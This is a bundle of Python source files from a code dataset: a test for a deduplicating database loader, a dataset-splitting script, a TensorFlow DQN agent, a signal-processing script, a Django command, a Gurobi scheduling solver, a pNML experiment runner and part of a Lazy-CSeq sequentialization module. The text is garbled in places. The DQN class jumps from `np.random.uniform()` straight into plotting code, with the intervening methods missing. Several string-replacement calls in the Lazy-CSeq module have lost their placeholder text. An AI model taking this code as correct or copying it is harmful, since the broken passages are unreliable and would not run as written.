'Hiroshi', 'last_name': 'Ieyasu', 'school_year': 'Masters',\n 'updated_at': datetime.datetime(2017, 4, 10, 18, 4, 4)}\n self.SAME_FIRST_NAME_AND_UPDATED_AT = {'first_name': 'Ifemelu', 'last_name': 'Adebayo',\n 'school_year': 'Masters',\n 'updated_at': datetime.datetime(2017, 4, 25, 19, 11, 14)}\n\n self.db = get_test_interface()\n self.loader = DedupeOnlyLoader(self.TEST_TABLE, self.TEST_MATCH_FILEDS, self.db)\n\n with self.db as db:\n db.delete(self.TEST_TABLE)\n for row in self.SEED_TEST_DATA:\n db.insert(self.TEST_TABLE, row)\n\n def clean_up():\n with self.db as db:\n db.delete(self.TEST_TABLE)\n\n self.addCleanup(clean_up)\n\n def test_loads_row_with_no_duplicates(self):\n self.loader.load([self.NO_DUP_FIELDS])\n with self.db as db:\n actual = db.select(self.TEST_TABLE, ['*'])\n\n expected_new_row = dict(self.NO_DUP_FIELDS)\n expected_new_row['ID'] = 5\n expected = list(self.SEED_TEST_DATA) + [expected_new_row]\n\n self.assertEqual(expected, actual)\n\n def test_loads_row_with_some_duplicates(self):\n self.loader.load([self.SAME_FIRST_NAME])\n with self.db as db:\n actual = db.select(self.TEST_TABLE, ['*'])\n\n expected_new_row = dict(self.SAME_FIRST_NAME)\n expected_new_row['ID'] = 5\n expected = list(self.SEED_TEST_DATA) + [expected_new_row]\n\n self.assertEqual(expected, actual)\n\n def test_skips_row_with_all_duplicates(self):\n self.loader.load([self.SAME_FIRST_NAME_AND_UPDATED_AT])\n with self.db as db:\n actual = db.select(self.TEST_TABLE, ['*'])\n\n expected = list(self.SEED_TEST_DATA)\n\n self.assertEqual(expected, actual)\n\n def test_handles_multiple_rows_correctly(self):\n self.loader.load([self.SAME_FIRST_NAME, self.NO_DUP_FIELDS, self.SAME_FIRST_NAME_AND_UPDATED_AT])\n with self.db as db:\n actual = db.select(self.TEST_TABLE, ['*'])\n\n expected_new_row1 = dict(self.SAME_FIRST_NAME)\n expected_new_row1['ID'] = 5\n expected_new_row2 = dict(self.NO_DUP_FIELDS)\n expected_new_row2['ID'] = 6\n expected = list(self.SEED_TEST_DATA) + [expected_new_row1, expected_new_row2]\n\n self.assertEqual(expected, actual)\n","sub_path":"tests/etl_tests/loader_tests/test_DedupeOnlyLoader.py","file_name":"test_DedupeOnlyLoader.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"202722026","text":"import pandas as pd\nimport shutil\nimport random\nimport os\n\nsrc_path = '/home/utopia/CVDATA/lumbar/0613/lumbar_train51/class/1/' # 多标签\ntarget_path = '/home/utopia/xuleichao/projects/tianchi-SparkAI/keypoint/multi-label-image-classification/MSCOCO'\n\nall_images = os.listdir(src_path)\n\ntrain_dir = 'train2014'\ntrain_image_info = 'trainAnnotation.csv'\n\ntest_dir = 'val2014'\ntest_image_info = 'testAnnotation.csv'\n\ndef label_hit(string, dct):\n if '-' not in string:\n dct[string.upper()] = '1'\n else:\n string_lst = string.split('-')\n for j in string_lst:\n dct[j.upper()] = '1'\n\n return dct\n\nif os.path.exists(target_path + '/train2014'):\n shutil.rmtree(target_path + '/train2014')\n os.mkdir(target_path + '/train2014')\nelse:\n os.mkdir(target_path + '/train2014')\n\ncsv_result_train = []\ncsv_result_test = []\nfor i in all_images:\n if os.path.getsize(src_path + i):\n class_dct = {'images_name': i, 'V1': '0', 'V2': '0', 'V3': '0', 'V4': '0', 'V5': '0'}\n info = i.split('_')\n label_dct = label_hit(info[1], class_dct)\n if random.random() > 0.8:\n csv_result_test.append(label_dct)\n shutil.copy(src_path + i, target_path + '/' + test_dir + '/' + i)\n else:\n csv_result_train.append(label_dct)\n shutil.copy(src_path + i, target_path + '/' + train_dir + '/' + i)\n\ncsv_df_train = pd.DataFrame(csv_result_train)\ncsv_df_train.to_csv('trainAnnotation.csv', header=None, index=False)\n\n\ncsv_df_test = pd.DataFrame(csv_result_test)\ncsv_df_test.to_csv('testAnnotation.csv', header=None, index=False)","sub_path":"keypoint/multi-label-image-classification/MSCOCO/get_datasets.py","file_name":"get_datasets.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"202948700","text":"# Author: Peiyong Jiang\n\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport time\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\nclass BRAIN:\n def __init__(self):\n self.numAction=4\n self.numFeature=2\n\n self.factorGreedyEpsilon=0.5\n self.factorGreedyEpsilonInc=0.001\n self.factorGreedyEpsilonMax=1.\n\n self.factorRewardDecayGamma=0.9\n\n self.factorLearningRate=0.0001\n\n self.sizeMemory=10000\n self.sizeBatch=128\n\n self.numAssignTE=500\n\n self.outputNNGraph=True\n\n self.memory=np.zeros((self.sizeMemory,self.numFeature*2+2))\n\n self.counterMemory=0\n self.counterLearn=0\n\n self.histLoss=[]\n\n self.BuildNet()\n\n\n\n # Get all variables in the netTarget and netEval\n paramsTarget=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,scope='netTarget')\n paramsEval=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,scope='netEval')\n\n with tf.variable_scope('assignTE'):\n self.assignTE=[tf.assign(t,e) for t,e in zip(paramsTarget,paramsEval)]\n\n self.sess=tf.Session()\n if self.outputNNGraph:\n os.system('rm -fr ./logs/*')\n tf.summary.FileWriter(\"logs/\",self.sess.graph)\n\n self.sess.run(tf.global_variables_initializer())\n\n\n\n #os.system('tensorboard --logdir logs')\n\n\n\n\n def BuildNet(self):\n # 整体思路:\n\n # 输入\n self.stateNow=tf.placeholder(tf.float32,[None,self.numFeature],name='stateNow')\n self.stateNext=tf.placeholder(tf.float32,[None,self.numFeature],name='stateNext')\n self.rewardNow=tf.placeholder(tf.float32,[None,],name='rewardNow')\n self.actionNow=tf.placeholder(tf.int32,[None,],name='actionNow')\n\n # 初始化\n initializeW,initializeB=tf.random_normal_initializer(0,0.3),tf.constant_initializer(0.1)\n\n\n # build evaluate net:\n with tf.variable_scope('netEval'):\n netEval_1=tf.layers.dense(self.stateNow,20,tf.nn.relu,\n kernel_initializer=initializeW,bias_initializer=initializeB,name='netEval_1')\n\n self.netEval=tf.layers.dense(netEval_1,self.numAction,\n kernel_initializer=initializeW,bias_initializer=initializeB,name='netEval')\n\n # Build target net:\n with tf.variable_scope('netTarget'):\n netTarget_1=tf.layers.dense(self.stateNext,20,tf.nn.relu,\n kernel_initializer=initializeW,bias_initializer=initializeB,name='netTarget_1')\n\n self.netTarget=tf.layers.dense(netTarget_1,self.numAction,\n kernel_initializer=initializeW,bias_initializer=initializeB,name='netTarget')\n\n # qTarget:未来的\n # qTarget = r + gamma * qMaxS_\n with tf.variable_scope('qTarget'):\n qTarget=self.rewardNow+self.factorRewardDecayGamma*tf.reduce_max(self.netTarget,axis=1,name='qTarget')\n self.qTarget=tf.stop_gradient(qTarget)\n\n\n # qEval: 现在的\n with tf.variable_scope('qEval'):\n indexAction=tf.stack([tf.range(tf.shape(self.actionNow)[0],dtype=tf.int32),self.actionNow],axis=1)\n self.qEval=tf.gather_nd(params=self.netEval,indices=indexAction)\n\n # loss\n with tf.variable_scope('loss'):\n self.loss=tf.reduce_mean(tf.squared_difference(self.qTarget,self.qEval,name='TD_Error'),name='loss')\n\n # train:\n with tf.variable_scope('train'):\n self.train=tf.train.RMSPropOptimizer(self.factorLearningRate).minimize(self.loss)\n\n\n def StoreMemory(self,stateNow,counterRunNow,actionNow,rewardNow,stateNext,counterRunNext):\n pieceMemory=np.hstack((stateNow,counterRunNow,actionNow,rewardNow,stateNext,counterRunNext))\n indexMemory=self.counterMemory % self.sizeMemory\n self.memory[indexMemory,:]=pieceMemory\n self.counterMemory+=1\n\n def SelSamples(self):\n if self.counterMemory>self.sizeMemory:\n indexSample=np.random.choice(self.sizeMemory,size=self.sizeBatch)\n else:\n indexSample=np.random.choice(self.counterMemory,size=self.sizeBatch)\n\n memoryBatch=self.memory[indexSample,:]\n return memoryBatch\n\n def SelAction(self,stateNow,counterRunNow):\n stateNow=np.array([stateNow,counterRunNow])\n stateNow=stateNow[np.newaxis,:]\n\n if np.random.uniform()numPrint:\n plt.plot(self.histLoss[-numPrint:])\n else:\n plt.plot(self.histLoss)\n plt.ylabel('loss')\n plt.xlabel('training step')\n plt.title(self.factorGreedyEpsilon)\n plt.pause(0.001)\n #plt.show()\n\n\n\n\nif __name__ == \"__main__\":\n print('-'*50)\n brain=BRAIN()\n\n print('END @ BRAIN')\n","sub_path":"DQN/30/BRAIN.py","file_name":"BRAIN.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"162940018","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport pickle\r\nimport definitions\r\n\r\nimport src.features.proc_lib as proc\r\nplt.close(\"all\")\r\n\r\n# Load the dataset object\r\nfilename = \"g1_p0_v8_2.pgdata\"\r\n#filename = \"cycle_5_end.pgdata\"\r\ndirectory = definitions.root + \"\\\\data\\\\processed\\\\\" + filename\r\nwith open(directory, 'rb') as filename:\r\n data = pickle.load(filename)\r\n\r\n#data.plot_rpm_over_time()\r\n\r\n# Band pass filter the signal\r\nsigprocobj = proc.Signal_Processing()\r\nsigprocobj.info = data.info\r\nsigprocobj.dataset = data.dataset\r\nsigprocobj.filter_column(\"Acc_Carrier\", 3000, 3500)\r\ntsa_obj = proc.Time_Synchronous_Averaging()\r\n\r\n# Create a TSA object\r\ntsa_obj.info = data.info\r\ntsa_obj.derived_attributes = data.derived_attributes\r\ntsa_obj.dataset = sigprocobj.dataset # Notice that the dataset is exchanged for filtered dataset\r\ntsa_obj.dataset_name = data.dataset_name\r\ntsa_obj.PG = data.PG\r\n\r\noffset_frac = (1/62)*(0.5)\r\nwinds = tsa_obj.window_extract(offset_frac, 2*1/62, \"Acc_Carrier\", plot=False)\r\nwind_ave = tsa_obj.window_average(winds,plot=True)\r\n\r\n#tsa = data.Compute_TSA(0,3/62, plot=True)\r\n#data.plot_rpm_over_time()\r\n\r\n\r\n","sub_path":"notebooks/2.0-time-synchronous-averaging-dev.py","file_name":"2.0-time-synchronous-averaging-dev.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"613437251","text":"from django.core.management.base import BaseCommand\nfrom django.db import models\n\n\nclass Command(BaseCommand):\n help = '42cc Project Info'\n\n def handle(self, *args, **options):\n def __print(output):\n self.stdout.write(output)\n self.stderr.write(\"error: %s\" % output)\n\n __print(\"Models info:\\n\")\n for klass in models.get_models():\n __print(\"%s: %s objects\\n\" %\n (klass.__name__, klass.objects.count()))\n","sub_path":"extras/management/commands/project_info.py","file_name":"project_info.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"302730913","text":"__author__ = 'Mark'\n\nfrom read_input import read_input_file\nfrom gurobipy import *\n\n\ndef main():\n test_scheduling_problem_1 = read_input_file('sample_input_1.txt')\n test_scheduling_problem_2 = read_input_file('sample_input_2.txt')\n test_scheduling_problem = test_scheduling_problem_2\n solve_scheduling_problem_guribi(test_scheduling_problem)\n\n\ndef solve_scheduling_problem_guribi(scheduling_problem):\n\n m = Model(\"Scheduling\")\n\n x_variables = {}\n y_variables = {}\n z_variables = {}\n\n # VARIABLE X:\n # actor i, scene j, slot s\n for actor_name in scheduling_problem.actors:\n x_variables[actor_name] = {}\n for scene_name in scheduling_problem.scenes:\n x_variables[actor_name][scene_name] = {}\n for slot_identity in scheduling_problem.slots:\n actor = scheduling_problem.actors[actor_name]\n importance = actor.get_scene_importance(scene_name)\n x_variables[actor_name][scene_name][slot_identity] = m.addVar(vtype=GRB.BINARY,\n obj=importance,\n name=\"Actor %s, Scene %s, Slot %s\" % (actor_name, scene_name, slot_identity))\n\n # VARIABLE Y:\n # scene j, slot s\n for scene_name in scheduling_problem.scenes:\n y_variables[scene_name] = {}\n for slot_identity in scheduling_problem.slots:\n y_variables[scene_name][slot_identity] = m.addVar(vtype=GRB.BINARY,\n name=\"Scene %s, Slot %s\" % (scene_name, slot_identity))\n\n # VARIABLE Z:\n # scene j, slot s\n for scene_name in scheduling_problem.scenes:\n z_variables[scene_name] = {}\n for slot_identity in scheduling_problem.slots:\n z_variables[scene_name][slot_identity] = m.addVar(vtype=GRB.BINARY,\n name=\"Scene %s, Slot %s\" % (scene_name, slot_identity))\n\n m.modelSense = GRB.MAXIMIZE\n m.update()\n\n # CONSTRAINT\n # one scene per unit time\n for slot_identity in scheduling_problem.slots:\n m.addConstr(quicksum(y_variables[scene_name][slot_identity] for scene_name in scheduling_problem.scenes) <= 1,\n \"Timeslot %s %s \" % slot_identity)\n\n # CONSTRAINT\n # each scene between min and max\n for scene_name in scheduling_problem.scenes:\n scene = scheduling_problem.scenes[scene_name]\n m.addConstr(quicksum(z_variables[scene_name][slot_identity] for slot_identity in scheduling_problem.slots) >= scene.min_rehearsals,\n \"Scene %s min\" % scene_name)\n m.addConstr(quicksum(z_variables[scene_name][slot_identity] for slot_identity in scheduling_problem.slots) <= scene.max_rehearsals,\n \"Scene %s max\" % scene_name)\n\n # CONSTRAINT\n # actor free\n for actor_name in scheduling_problem.actors:\n for scene_name in scheduling_problem.scenes:\n for slot_identity in scheduling_problem.slots:\n actor = scheduling_problem.actors[actor_name]\n slot = scheduling_problem.slots[slot_identity]\n if slot in actor.free_slots and scene_name in actor.scenes_of_actor:\n m.addConstr(x_variables[actor_name][scene_name][slot_identity] <= y_variables[scene_name][slot_identity],\n 'Actor Free %s %s %s' % (actor_name, scene_name, slot_identity))\n else:\n m.addConstr(x_variables[actor_name][scene_name][slot_identity] == 0,\n 'Actor Not Free %s %s %s' % (actor_name, scene_name, slot_identity))\n\n # CONSTRAINT\n # scheduling constraints\n for scene_name in scheduling_problem.scenes:\n scene = scheduling_problem.scenes[scene_name]\n length = scene.length\n segments_by_day = scheduling_problem.segments_by_day\n days = len(segments_by_day)\n for day in range(days):\n # 1. cannot start towards end\n segments_this_day = segments_by_day[day]\n for segment in range(segments_this_day-length+1, segments_this_day):\n slot_identity = (day, segment)\n m.addConstr(z_variables[scene_name][slot_identity] == 0,\n 'Scheduling Constraint LATE for Scene %s at Slot %s' % (scene_name, slot_identity))\n # 2. ongoing iff started in past [length] segments\n for segment in range(segments_this_day):\n slot_identity = (day, segment)\n min_segment = max(segment - length, -1)\n m.addConstr(y_variables[scene_name][slot_identity] == quicksum(z_variables[scene_name][(day, i_segment)] for i_segment in range(segment, min_segment, -1)),\n 'Scheduling Constraint REG for Scene %s at Slot %s' % (scene_name, slot_identity))\n\n # solve\n m.optimize()\n\n # print solution\n print(\"Total Utility: \", m.objVal)\n print(\"Solution\")\n for scene_name in scheduling_problem.scenes:\n for slot_identity in scheduling_problem.slots:\n if z_variables[scene_name][slot_identity].x == 1.0:\n print(scene_name, ' rehearse start in ', slot_identity)\n\n return 0\n\n\ndef gurobi_test():\n\n m = Model(\"mip1\")\n\n x = m.addVar(vtype=GRB.BINARY, name=\"x\")\n y = m.addVar(vtype=GRB.BINARY, name=\"y\")\n z = m.addVar(vtype=GRB.BINARY, name=\"z\")\n\n m.update()\n\n m.setObjective(x + y + 2 * z, GRB.MAXIMIZE)\n\n m.addConstr(x + 2 * y + 3 * z >= 4, \"c01\")\n m.addConstr(x + 2 * y + 3 * z <= 5, \"c02\")\n\n m.addConstr(x + y >= 1, \"c1\")\n m.addConstr(x + z <= 1, \"c2\")\n\n m.optimize()\n\n for v in m.getVars():\n print(v.varName, v.x)\n\n print('Obj:', m.objVal)\n\n\nif __name__ == '__main__':\n main()","sub_path":"solve_scheduling_problem.py","file_name":"solve_scheduling_problem.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"161857024","text":"import copy\nimport logging\nimport multiprocessing as mp\nimport os\nimport os.path as osp\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom data_utils import DataBase\nfrom pnml_utils import Pnml\n\nlogger = logging.getLogger(__name__)\n\n\ndef execute_x_vec(x_test_array, data_h: DataBase, pnml_h, is_mp: bool, out_dir: str) -> list:\n # Initialize output\n save_dir_genies_outputs = osp.join(out_dir, 'genies_output')\n save_file_name = osp.join(out_dir, 'res_model_degree_{}_lamb_{}.npy'.format(data_h.model_degree, pnml_h.lamb))\n save_theta_erm_file_name = osp.join(out_dir,\n 'res_theta_erm_model_degree_{}_lamb_{}.npy'.format(data_h.model_degree,\n pnml_h.lamb))\n np.save(save_theta_erm_file_name, pnml_h.theta_erm)\n os.makedirs(save_dir_genies_outputs, exist_ok=True)\n\n # iterate on test samples\n if is_mp is False:\n res_list = execute_x_test_array(x_test_array, data_h, pnml_h, save_file_name, save_dir_genies_outputs)\n else:\n res_list = execute_x_test_array_mp(x_test_array, data_h, pnml_h, save_file_name, save_dir_genies_outputs)\n logger.info('Save to {}'.format(save_file_name))\n np.save(save_file_name, res_list)\n\n return res_list\n\n\ndef execute_x_test(x_test: float, data_h: DataBase, pnml_h: Pnml, save_dir_genies_outputs: str) -> dict:\n phi_test = data_h.convert_point_to_features(x_test, data_h.model_degree)\n y_hat_erm = pnml_h.predict_erm(phi_test)\n regret = pnml_h.execute_regret_calc(phi_test)\n\n # Save genies products\n np.save(osp.join(save_dir_genies_outputs, f'genies_outputs_{x_test}.npy'), pnml_h.genies_output)\n return {'x_test': x_test, 'regret': regret, 'y_hat_erm': y_hat_erm}\n\n\ndef execute_x_test_array(x_test_array: np.ndarray, data_h: DataBase, pnml_h: Pnml,\n save_file_name: str, save_dir_genies_outputs: str) -> list:\n res_list = []\n for i, x_test in enumerate(x_test_array):\n res = execute_x_test(x_test, data_h, pnml_h, save_dir_genies_outputs)\n res_list.append(res)\n logger.info('[{}/{}] x_test={}. Save to {}'.format(i, len(x_test_array), x_test, save_file_name))\n np.save(save_file_name, res_list)\n return res_list\n\n\ndef execute_x_test_array_mp(x_test_array: np.ndarray, data_h: DataBase, pnml_h: Pnml,\n save_file_name: str, save_dir_genies_outputs: str) -> list:\n pool = mp.Pool()\n logger.info('mp.cpu_count: {}'.format(mp.cpu_count()))\n results = []\n pbar = tqdm(total=len(x_test_array))\n\n def log_result(result):\n results.append(result)\n pbar.update()\n\n for i, x_test in enumerate(x_test_array):\n pool.apply_async(execute_x_test,\n args=(x_test, copy.deepcopy(data_h), copy.deepcopy(pnml_h), save_dir_genies_outputs),\n callback=log_result)\n\n pool.close()\n pool.join()\n pbar.close()\n res_list = sorted(results, key=lambda k: k['x_test'])\n np.save(save_file_name, res_list)\n return res_list\n","sub_path":"src/experimnet_utils.py","file_name":"experimnet_utils.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"10065236","text":"\"\"\" Lazy-CSeq Sequentialization module\n maintained by Truc Nguyen Lam, University of Southampton.\n\"\"\"\nVERSION = 'lazyseqnewschedule-0.1-2016.08.08'\n\n\"\"\"\n\nTransformation:\n implements the lazy sequentialization schema\n (see Inverso, Tomasco, Fischer, La Torre, Parlato, CAV'14)\n\nPrerequisites:\n - all functions should have been inlined, except the main(), all thread functions, all __CSEQ_atomic_ functions, and function __CSEQ_assert\n - all loops should habe been unrolled\n - no two threads refers to the same thread function (use module duplicator.py)\n\nTODO:\n - get rid of _init_scalar() (see ext. notes)\n - check the STOP() inserting mechanism\n - this schema assumes no mutex_lock() in main() - is this fine?\n - handle typedef in guessing numbit\n\nChangelog:\n 2017.08.17 preserve __cs_exit function (not overriding with STOP_*VOID)\n 2017.02.28 add option to only guess __cs_pc_cs (instead of using addition)\n 2016.11.30 temporary disable of static for argc and argv variables\n 2016.11.29 remove nondet initialization if backend is CBMC\n 2016.11.22 fix problem with function pointer reference (smacker benchmarks)\n 2016.09.21 add specific main function to KLEE backend (with only round robin approach)\n 2016.09.21 fix small bug that causes the injection of GUARD in atomic function\n 2016.08.12 Add option to use only one pc_cs\n 2016.08.12 Add preanalysis from framac to guess the number of bits for each variable\n 2016.08.10 Add round robin (old schedule) option\n 2016.08.09 Add decomposepc option\n 2016.08.08 Initial version\n\n\"\"\"\nimport math, re, os.path\nfrom time import gmtime, strftime\nimport pycparser.c_parser, pycparser.c_ast, pycparser.c_generator\nimport core.common, core.module, core.parser, core.utils\n\n\nclass lazyseqnewschedule(core.module.Translator):\n __lines = {} # lines for each thread\n __threadName = ['main'] # name of threads, as they are found in pthread_create(s) - the threads all have different names\n __threadIndex = {} # index of the thread = value of threadcount when the pthread_create to that thread was discovered\n __threadCount = 0 # pthread create()s found so far\n\n __labelLine = {} # statement number where labels are defined [function, label]\n __gotoLine = {} # statement number where goto to labels appear [function, label]\n __maxInCompound = 0 # max label within a compound\n __labelLength = 55 # for labels to have all the same length, adding padding when needed\n __startChar = 't' # special char to distinguish between labeled and non-labelled lines\n\n __stmtCount = -1 # thread statement counter (to build thread labels)\n\n __currentThread = '' # name of the current thread (also used to build thread labels)\n\n __threadbound = 0 # bound on the number of threads\n\n __firstThreadCreate = False # set once the first thread creation is met\n __globalMemoryAccessed = False # used to limit context-switch points (when global memory is not accessed, no need to insert them)\n\n __first = False\n __atomic = False # no context-switch points between atomic_start() and atomic_end()\n\n _bitwidth = {} # custom bitwidth for specific int variables, e.g. ['main','var'] = 4\n\n _deadlockcheck = False\n\n __decomposepc = False # decompose pc\n\n __one_pc_cs = False # use only one pc_cs variable\n\n __roundrobin = True\n\n __preanalysis = {}\n __visiting_struct = False\n __struct_stack = [] # stack of struct name\n\n __visit_funcReference = False\n\n __extra_nondet = '= __CSEQ_nondet_uint()'\n\n __donotcheckpointer = False\n\n __guess_cs_only = False\n\n __dir_path = os.path.dirname(os.path.abspath(__file__))\n\n def init(self):\n self.addInputParam('rounds', 'round-robin schedules', 'r', '1', False)\n self.addInputParam('threads', 'max no. of thread creations (0 = auto)', 't', '0', False)\n self.addInputParam('deadlock', 'check for deadlock', '', default=False, optional=True)\n self.addInputParam('decomposepc', 'use seperate variable for each pc', '', default=False, optional=True)\n # self.addInputParam('onepccs', 'use one guess pc variable', '', default=False, optional=True)\n self.addInputParam('robin', 'use round robin schedule', '', default=False, optional=True)\n self.addInputParam('guess-cs-only', 'context switch is guessed only', '', default=False, optional=True)\n self.addInputParam('norobin', 'use new schedule', '', default=False, optional=True)\n self.addInputParam('preanalysis', 'use preanalysis input from abstract interpretation backend', 'u', default=None, optional=True)\n\n self.addInputParam('donotcheckvisiblepointer', 'do not check pointer for visible statement', '', default=False, optional=True)\n\n self.addOutputParam('bitwidth')\n self.addOutputParam('header')\n\n\n def loadfromstring(self, string, env):\n if self.getInputParamValue('deadlock') is not None:\n self._deadlockcheck = True\n\n threads = int(self.getInputParamValue('threads'))\n rounds = int(self.getInputParamValue('rounds'))\n backend = self.getInputParamValue('backend')\n\n if self.getInputParamValue(\"preanalysis\") is not None:\n self.__preanalysis = self.getInputParamValue(\"preanalysis\")\n if env.debug:\n seqfile = core.utils.rreplace(env.inputfile, '/', '/_cs_', 1) if '/' in env.inputfile else '_cs_' + env.inputfile\n if env.outputfile is not None and env.outputfile != '':\n seqfile = env.outputfile\n logfile = seqfile + '.framac.log.extract'\n with open(logfile, \"w\") as logfile:\n logfile.write(str(self.__preanalysis))\n\n if self.getInputParamValue('decomposepc') is not None:\n self.__decomposepc = True\n\n if self.getInputParamValue('onepccs') is not None:\n self.__one_pc_cs = True\n\n if self.__decomposepc and self.__one_pc_cs:\n self.error(\"Cannot select to option decomposepc and onepccs at the same time\\n\")\n\n if self.getInputParamValue('norobin') is not None:\n self.__roundrobin = False\n\n if self.getInputParamValue('robin') is not None:\n self.__roundrobin = True\n\n if self.getInputParamValue('donotcheckvisiblepointer') is not None:\n self.__donotcheckpointer = True\n\n if self.getInputParamValue('guess-cs-only') is not None:\n self.__guess_cs_only = True\n\n self.__threadbound = threads\n\n super(self.__class__, self).loadfromstring(string, env)\n\n if backend == 'cbmc' or backend is None:\n self.__extra_nondet = ''\n\n if backend == 'klee': # specific main for klee\n # Only use round robin style for klee\n if self.__decomposepc:\n self.output += self.__createMainKLEERoundRobinDecomposePC(rounds)\n elif self.__one_pc_cs:\n self.output += self.__createMainKLEERoundRobinOnePCCS(rounds)\n else:\n self.output += self.__createMainKLEERoundRobin(rounds)\n else:\n # Add the new main().\n if self.__roundrobin:\n if self.__decomposepc:\n self.output += self.__createMainRoundRobinDecomposePC(rounds)\n elif self.__one_pc_cs:\n self.output += self.__createMainRoundRobinOnePCCS(rounds)\n else:\n self.output += self.__createMainRoundRobin(rounds)\n else:\n if self.__decomposepc:\n self.output += self.__createMainDecomposePC(rounds)\n elif self.__one_pc_cs:\n self.output += self.__createMainOnePCCS(rounds)\n else:\n self.output += self.__createMain(rounds)\n\n # Insert the thread sizes (i.e. number of visible statements).\n lines = ''\n\n i = maxsize = 0\n\n for t in self.__threadName:\n if i <= self.__threadbound:\n if i>0: lines += ', '\n lines += str(self.__lines[t])\n maxsize = max(int(maxsize), int(self.__lines[t]))\n #print \"CONFRONTO %s %s \" % (int(maxsize), int(self.__lines[t]))\n i +=1\n\n ones = ''\n if i <= self.__threadbound:\n if i>0: ones += ', '\n ones += '-1'\n i +=1\n\n # Generate the header.\n #\n # the first part is not parsable (contains macros)\n # so it is passed to next module as a header...\n #print(dir_path)\n if self.__decomposepc:\n header = core.utils.printFile(self.__dir_path+'/lazyseqAdecomposepc.c')\n elif self.__one_pc_cs:\n header = core.utils.printFile(self.__dir_path+'/lazyseqAonepccs.c')\n else:\n header = core.utils.printFile(self.__dir_path+'/lazyseqA.c')\n header = header.replace('',str(threads))\n header = header.replace('',str(rounds))\n self.setOutputParam('header', header)\n\n i = 0\n pc_decls = ''\n pc_cs_decls = ''\n join_replace = ''\n for t in self.__threadName:\n if i <= self.__threadbound:\n threadsize = self.__lines[t]\n k = int(math.floor(math.log(threadsize,2)))+1\n pc_decls += 'unsigned int __cs_pc_%s;\\n' % i\n self._bitwidth['','__cs_pc_%s' % i] = k\n pc_cs_decls += 'unsigned int __cs_pc_cs_%s;\\n' % i\n self._bitwidth['','__cs_pc_cs_%s' % i] = k + 1\n join_replace += 'if (__cs_id == %s) __CSEQ_assume(__cs_pc_%s == __cs_thread_lines[%s]);\\n' % (i, i, i)\n i += 1\n join_replace += 'if (__cs_id >= %s) __CSEQ_assume(0);\\n' % (i)\n\n # ..this is parsable and is added on top of the output code,\n # as next module is able to parse it.\n if not self._deadlockcheck:\n if self.__decomposepc:\n header = core.utils.printFile(self.__dir_path+'/lazyseqBnewscheduledecomposepc.c').replace('',lines)\n header = header.replace('', pc_decls + pc_cs_decls)\n header = header.replace('', join_replace)\n header = header.replace('', str(threads+1))\n elif self.__one_pc_cs:\n header = core.utils.printFile(self.__dir_path+'/lazyseqBnewscheduleonepccs.c').replace('',lines)\n header = header.replace('', str(threads+1))\n else:\n header = core.utils.printFile(self.__dir_path+'/lazyseqBnewschedule.c').replace('',lines)\n header = header.replace('', str(threads+1))\n else:\n header = core.utils.printFile(self.__dir_path+'/lazyseqBdeadlock.c').replace('',lines)\n header = header.replace('', ones)\n\n self.insertheader(header)\n\n # Calculate exact bitwidth size for a few integer control variables of the seq. schema,\n # good in case the backend handles bitvectors.\n self._bitwidth['','__cs_active_thread'] = 1\n k = int(math.floor(math.log(maxsize,2)))+1\n if self.__decomposepc is False:\n self._bitwidth['','__cs_pc'] = k\n self._bitwidth['','__cs_pc_cs'] = k+1\n\n self._bitwidth['','__cs_thread_lines'] = k\n\n k = int(math.floor(math.log(self.__threadbound,2)))+1\n self._bitwidth['','__cs_last_thread'] = k\n self._bitwidth[core.common.changeID['pthread_mutex_lock'],'__cs_thread_index'] = k\n self._bitwidth[core.common.changeID['pthread_mutex_unlock'],'__cs_thread_index'] = k\n\n # self.setOutputParam('__cs_bitwidth', self._bitwidth)\n\n # Fix gotos by inserting ASS_GOTO(..) blocks before each goto,\n # excluding gotos which destination is the line below.\n for (a,b) in self.__labelLine:\n if (a,b) in self.__gotoLine and (self.__labelLine[a,b] == self.__gotoLine[a,b]+1):\n self.output = self.output.replace('<%s,%s>' % (a,b), '')\n else:\n self.output = self.output.replace('<%s,%s>' % (a,b), 'ASS_GOTO(%s)' % self.__labelLine[a,b])\n\n self.setOutputParam('bitwidth', self._bitwidth)\n\n def visit_Decl(self,n,no_type=False):\n # no_type is used when a Decl is part of a DeclList, where the type is\n # explicitly only for the first declaration in a list.\n #\n s = n.name if no_type else self._generate_decl(n)\n\n if 'scalar' in self.__preanalysis and n.name in self.__preanalysis['scalar']:\n self._bitwidth[self.__currentThread, n.name] = self.__preanalysis['scalar'][n.name]\n\n if 'pointer' in self.__preanalysis and n.name in self.__preanalysis['pointer']:\n self._bitwidth[self.__currentThread, n.name] = self.__preanalysis['pointer'][n.name]\n\n if 'array' in self.__preanalysis and n.name in self.__preanalysis['array']:\n self._bitwidth[self.__currentThread, n.name] = self.__preanalysis['array'][n.name]\n\n if (self.__visiting_struct and\n 'struct' in self.__preanalysis and\n self.__struct_stack[-1] in self.__preanalysis['struct'] and\n n.name in self.__preanalysis['struct'][self.__struct_stack[-1]]\n ):\n # TODO: remember that for a field in struct, only multiple of 8bits is acceptable\n numbit = self.__preanalysis['struct'][self.__struct_stack[-1]][n.name]\n self._bitwidth[self.__struct_stack[-1], n.name] = numbit\n\n if n.bitsize: s += ' : ' + 